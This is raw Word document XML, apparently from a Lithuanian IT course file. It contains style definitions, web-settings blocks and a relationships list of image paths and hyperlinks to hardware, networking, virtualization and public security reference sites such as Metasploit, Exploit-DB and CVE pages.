    <w:name w:val="Diagrama00000000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="007E1189"/>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00000">
    <w:name w:val="Diagrama000000000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00DC18C9"/>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000000">
    <w:name w:val="Diagrama0000000000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0098340F"/>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0000000">
    <w:name w:val="Diagrama00000000000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F93999"/>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00000000">
    <w:name w:val="Diagrama000000000000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="003F1AB1"/>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000000000">
    <w:name w:val="Diagrama0000000000000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="000A4C46"/>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0000000000">
    <w:name w:val="Diagrama00000000000000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="008C5831"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00EC2CC0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00EC2CC0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00EC2CC0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00EC2CC0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00EC2CC0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama000000000000000000000000000000000000000000000000000000000000000000000">
    <w:name w:val="Diagrama000000000000000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B8307A"/>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000000000000">
    <w:name w:val="Diagrama0000000000000000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B8307A"/>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0000000000000">
    <w:name w:val="Diagrama00000000000000000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B8307A"/>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00000000000000">
    <w:name w:val="Diagrama000000000000000000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B8307A"/>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000000000000000">
    <w:name w:val="Diagrama0000000000000000000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B8307A"/>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0000000000000000">
    <w:name w:val="Diagrama00000000000000000000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002348D0"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama000000000000000000000000000000000000000000000000000000000000000000000000000">
    <w:name w:val="Diagrama000000000000000000000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="003415BB"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention1">
    <w:name w:val="Unresolved Mention1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00311A8A"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention2">
    <w:name w:val="Unresolved Mention2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C64EF"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention3">
    <w:name w:val="Unresolved Mention3"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00685B48"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Lentelstinklelis1">
    <w:name w:val="Lentelės tinklelis1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:next w:val="TableGrid"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00CD64DE"/>
    <w:rPr>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77221"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention5">
    <w:name w:val="Unresolved Mention5"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F021B"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DD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6741">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>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184709379">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="234097501">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331763056">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="342127512">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="483664747">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08854325">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="855848878">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>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62068241">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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17763652">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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4456885">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112433201">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1209953828">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1231647352">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1237739184">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3090943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404832478">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1597710480">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051372380">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20947436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rapid7.com/metasploit/msf-overview/" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/topic/installing-configuring-centos-7-virtualbox/" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.seagate.com/gb/en/support/kb/the-bios-does-not-detect-or-recognize-the-solid-state-drive-005707en/" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.neweggbusiness.com/smartbuyer/over-easy/5-free-tools-to-draw-a-network-diagram/" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.logicalincrements.com/articles/building-pc-3d-rendering-animation" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lifewire.com/wireshark-tutorial-4143298" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.google.com/store/apps/details?id=com.farproc.wifi.analyzer&amp;hl=en_US&amp;gl=US" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intel.com/content/www/us/en/products/processors/core.html" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=3TPsuio8PP8" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sysaid.com/blog/entry/itsm-basics-a-simple-introduction-to-incident-management" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=mN12es1rbJ8" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.searchenginewatch.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computernetworkingnotes.com/ccna-study-guide/vlan-configuration-commands-step-by-step-explained.html" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intel.com/content/www/us/en/gaming/resources/why-wont-my-computer-turn-on.html" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amd.com/en/products/processors-desktop" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dnsstuff.com/what-is-network-topology" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kb.acronis.com/content/61645" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.samba.org/samba/security/CVE-2007-2447.html" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.darkwiki.in/top-5-operating-system-for-ethical-hacking-and-penetration-testing/" TargetMode="External"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/windows/tips-to-improve-pc-performance-in-windows-10-b3b3ef5b-5953-fb6a-2528-4bbed82fba96" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.archive.org/" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netacad.com/courses/packet-tracer/introduction-packet-tracer" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cpu-world.com/CPUs" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxconfig.org/how-to-install-putty-in-redhat-linux-8" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8407" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="cid:image001.jpg@01D40F86.D718AD60" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.darkwiki.in/top-5-operating-system-for-ethical-hacking-and-penetration-testing/" TargetMode="External"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/policies" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/metasploitable/" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/windows/backup-and-restore-in-windows-10-352091d2-bb9d-3ea3-ed18-52ef2b88cbef" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.diagrams.net" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dnsstuff.com/what-is-network-topology" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vitux.com/install-centos-with-virtualbox-on-windows/" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vitux.com/install-centos-with-virtualbox-on-windows/" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intel.com/content/www/us/en/gaming/resources/why-wont-my-computer-turn-on.html" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sysaid.com/blog/entry/itsm-basics-a-simple-introduction-to-problem-management" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://about.pinterest.com/en/terms-service" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lt.phhsnews.com/how-do-ip-addresses-work5759" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/get-started-19/install-upgrade-migrate-19" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.corel.com/hc/en-us/articles/219326157-CorelDRAW-Graphics-Suite-X8-System-Requirements" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=mN12es1rbJ8" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisco.com/c/en/us/support/routers/4321-integrated-services-router/model.html" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxhint.com/install_centos8_virtualbox/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/system-center/scsm/troubleshoot-with-tasks?view=sc-sm-2019%23run-a-task-from-an-incident-view" TargetMode="External"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/p/wifi-analyzer/9nblggh33n0n?activetab=pivot:overviewtab" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2035" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acronis.com/en-eu/homecomputing/thanks/acronis-true-image-2021/" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://motionarray.com/learn/davinci-resolve/" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cpu-world.com/CPUs" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://academyofanimatedart.com/a-guide-to-the-best-computer-for-3d-modeling-and-rendering/" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ui.com/unifi-switching/unifi-switch-8/" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/List_of_MediaTek_processors" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxhint.com/install_centos8_virtualbox/" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.jpg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=lqjrF7f_eI4" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.metageek.com/products/rampart-home/" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cpu-world.com/CPUs" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId219" 